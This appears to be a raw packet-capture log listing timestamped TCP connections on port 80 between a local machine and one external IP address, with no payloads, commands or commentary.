                                                                                                                                                                        Jan 3, 2025 07:58:33.751497984 CET804996986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:33.751569033 CET4996980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:33.751686096 CET4996980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:33.757656097 CET804996986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:34.105530024 CET4996980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:34.110363960 CET804996986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:34.110378027 CET804996986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:34.110385895 CET804996986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:34.522464037 CET804996986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:34.574181080 CET4996980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:34.576306105 CET4997580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:34.576570034 CET4996980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:34.581083059 CET804997586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:34.581512928 CET804996986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:34.581588984 CET4996980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:34.581605911 CET4997580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:34.581729889 CET4997580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:34.586513996 CET804997586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:34.697829962 CET4997680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:34.702606916 CET804997686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:34.704988003 CET4997680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:34.705064058 CET4997680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:34.709836006 CET804997686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:34.933629036 CET4997580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:34.938456059 CET804997586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:34.938518047 CET804997586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:35.058855057 CET4997680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:35.063757896 CET804997686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:35.063769102 CET804997686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:35.063779116 CET804997686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:35.259982109 CET804997586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:35.308557034 CET4997580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:35.386782885 CET804997586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:35.395519018 CET804997686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:35.433656931 CET4997580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:35.449266911 CET4997680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:35.522759914 CET804997686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:35.652169943 CET4997580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:35.652240038 CET4997680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:35.653347969 CET4998580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:35.657150984 CET804997586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:35.657447100 CET804997686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:35.657502890 CET4997580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:35.657545090 CET4997680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:35.658155918 CET804998586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:35.660303116 CET4998580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:35.660449982 CET4998580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:35.665177107 CET804998586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:36.012002945 CET4998580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:36.016879082 CET804998586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:36.016896009 CET804998586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:36.016906023 CET804998586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:36.394627094 CET804998586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:36.449238062 CET4998580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:36.528743029 CET804998586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:36.648143053 CET4998580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:36.648433924 CET4999380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:36.653091908 CET804998586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:36.653147936 CET4998580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:36.653177023 CET804999386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:36.653237104 CET4999380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:36.653472900 CET4999380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:36.658198118 CET804999386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:37.012168884 CET4999380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:37.017113924 CET804999386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:37.017124891 CET804999386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:37.017132044 CET804999386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:37.352690935 CET804999386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:37.449204922 CET4999380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:37.491437912 CET804999386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:37.622716904 CET4999380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:37.623055935 CET4999980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:37.627737045 CET804999386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:37.627804995 CET804999986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:37.627863884 CET4999380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:37.627902031 CET4999980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:37.628016949 CET4999980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:37.632719040 CET804999986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:37.980556011 CET4999980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:37.985455036 CET804999986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:37.985467911 CET804999986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:37.985476017 CET804999986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:38.333779097 CET804999986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:38.468383074 CET804999986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:38.468483925 CET4999980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:38.591526985 CET4999980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:38.591775894 CET5000580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:38.596458912 CET804999986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:38.596519947 CET4999980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:38.596573114 CET805000586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:38.596677065 CET5000580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:38.596811056 CET5000580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:38.601528883 CET805000586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:38.949265957 CET5000580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:38.954158068 CET805000586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:38.954173088 CET805000586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:38.954181910 CET805000586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:39.295346022 CET805000586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:39.355449915 CET5000580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:39.425709009 CET805000586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:39.542956114 CET5000580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:39.548413992 CET5000580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:39.549607992 CET5001680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:39.553536892 CET805000586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:39.553607941 CET5000580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:39.554366112 CET805001686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:39.554429054 CET5001680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:39.554532051 CET5001680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:39.559235096 CET805001686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:39.902462006 CET5001680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:39.907337904 CET805001686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:39.907351971 CET805001686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:39.907368898 CET805001686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:40.234961987 CET805001686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:40.277347088 CET5001680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:40.363173962 CET805001686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:40.403879881 CET5002280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:40.404067039 CET5001680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:40.408663034 CET805002286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:40.408726931 CET5002280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:40.408843040 CET5002280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:40.408981085 CET805001686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:40.409027100 CET5001680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:40.413577080 CET805002286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:40.507967949 CET5002380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:40.508100986 CET5002280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:40.512845993 CET805002386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:40.512917995 CET5002380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:40.513061047 CET5002380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:40.517807007 CET805002386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:40.559910059 CET805002286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:40.871166945 CET5002380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:40.876034975 CET805002386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:40.876049995 CET805002386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:40.876060963 CET805002386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:40.886852980 CET805002286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:40.886914015 CET5002280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:41.214803934 CET805002386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:41.349225044 CET805002386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:41.349786043 CET5002380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:41.485321045 CET5002380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:41.485661983 CET5002980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:41.490401983 CET805002386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:41.490457058 CET5002380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:41.490523100 CET805002986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:41.490583897 CET5002980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:41.490739107 CET5002980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:41.495469093 CET805002986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:41.839940071 CET5002980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:41.844793081 CET805002986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:41.844805956 CET805002986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:41.844816923 CET805002986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:42.188611984 CET805002986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:42.230458975 CET5002980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:42.320246935 CET805002986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:42.371114969 CET5002980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:42.451031923 CET5002980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:42.451390982 CET5003580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:42.456111908 CET805002986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:42.456135988 CET805003586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:42.456181049 CET5002980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:42.456218004 CET5003580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:42.456325054 CET5003580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:42.472616911 CET805003586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:42.808912039 CET5003580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:42.814352989 CET805003586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:42.814367056 CET805003586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:42.814421892 CET805003586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:43.163222075 CET805003586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:43.293976068 CET805003586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:43.295305014 CET5003580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:43.419322014 CET5003580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:43.419699907 CET5004680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:43.424377918 CET805003586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:43.424432039 CET5003580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:43.424484968 CET805004686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:43.424571991 CET5004680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:43.424702883 CET5004680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:43.429408073 CET805004686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:43.777504921 CET5004680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:43.782334089 CET805004686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:43.782347918 CET805004686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:43.782356024 CET805004686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:44.139565945 CET805004686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:44.270620108 CET805004686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:44.270823956 CET5004680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:44.407130957 CET5004680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:44.407427073 CET5005280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:44.412108898 CET805004686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:44.412156105 CET5004680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:44.412170887 CET805005286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:44.412264109 CET5005280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:44.412421942 CET5005280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:44.417140961 CET805005286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:44.761809111 CET5005280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:44.766758919 CET805005286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:44.766772032 CET805005286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:44.766782999 CET805005286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:45.090997934 CET805005286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:45.136707067 CET5005280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:45.222769022 CET805005286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:45.277332067 CET5005280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:45.368835926 CET5005280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:45.369189024 CET5005880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:45.373852015 CET805005286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:45.373904943 CET5005280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:45.373954058 CET805005886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:45.374021053 CET5005880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:45.374135971 CET5005880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:45.378894091 CET805005886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:45.543783903 CET5005980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:45.543927908 CET5005880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:45.548665047 CET805005986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:45.548722982 CET5005980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:45.548806906 CET5005980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:45.553599119 CET805005986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:45.591922998 CET805005886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:45.678177118 CET5006480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:45.683023930 CET805006486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:45.683087111 CET5006480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:45.683199883 CET5006480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:45.687906981 CET805006486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:45.871419907 CET805005886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:45.871491909 CET5005880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:45.902426004 CET5005980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:45.907255888 CET805005986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:45.907529116 CET805005986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:46.027565002 CET5006480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:46.032433987 CET805006486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:46.032450914 CET805006486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:46.032460928 CET805006486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:46.244508028 CET805005986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:46.339843035 CET5005980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:46.376009941 CET805005986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:46.394089937 CET805006486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:46.449208021 CET5005980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:46.449208021 CET5006480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:46.528292894 CET805006486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:46.575606108 CET5006480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:46.681885004 CET5005980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:46.681947947 CET5006480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:46.682332993 CET5007180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:46.686836004 CET805005986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:46.686891079 CET5005980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:46.687063932 CET805006486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:46.687117100 CET805007186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:46.687169075 CET5006480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:46.687200069 CET5007180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:46.687335014 CET5007180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:46.692058086 CET805007186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:47.043066025 CET5007180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:47.047971010 CET805007186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:47.047985077 CET805007186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:47.047996044 CET805007186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:47.371433020 CET805007186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:47.449208021 CET5007180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:47.500478029 CET805007186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:47.651575089 CET5007180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:47.796475887 CET5007780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:47.796547890 CET5007180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:47.801424980 CET805007786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:47.801834106 CET805007186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:47.801920891 CET5007180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:47.801934004 CET5007780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:47.802077055 CET5007780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:47.806859970 CET805007786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:48.152678967 CET5007780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:48.157511950 CET805007786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:48.157522917 CET805007786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:48.157533884 CET805007786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:48.507107973 CET805007786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:48.558608055 CET5007780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:48.636522055 CET805007786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:48.683583021 CET5007780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:48.791682005 CET5007780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:48.796660900 CET805007786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:48.796705961 CET5007780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:48.797835112 CET5008080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:48.802622080 CET805008086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:48.802680969 CET5008080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:48.802850962 CET5008080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:48.807627916 CET805008086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:49.152419090 CET5008080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:49.157393932 CET805008086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:49.157408953 CET805008086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:49.157418013 CET805008086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:49.488034964 CET805008086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:49.624397993 CET805008086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:49.626765013 CET5008080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:49.745357037 CET5008080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:49.745713949 CET5008180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:49.750330925 CET805008086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:49.750519037 CET805008186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:49.750586033 CET5008080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:49.750631094 CET5008180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:49.750730991 CET5008180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:49.755575895 CET805008186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:50.105673075 CET5008180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:50.110516071 CET805008186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:50.110567093 CET805008186.110.194.28192.168.2.4
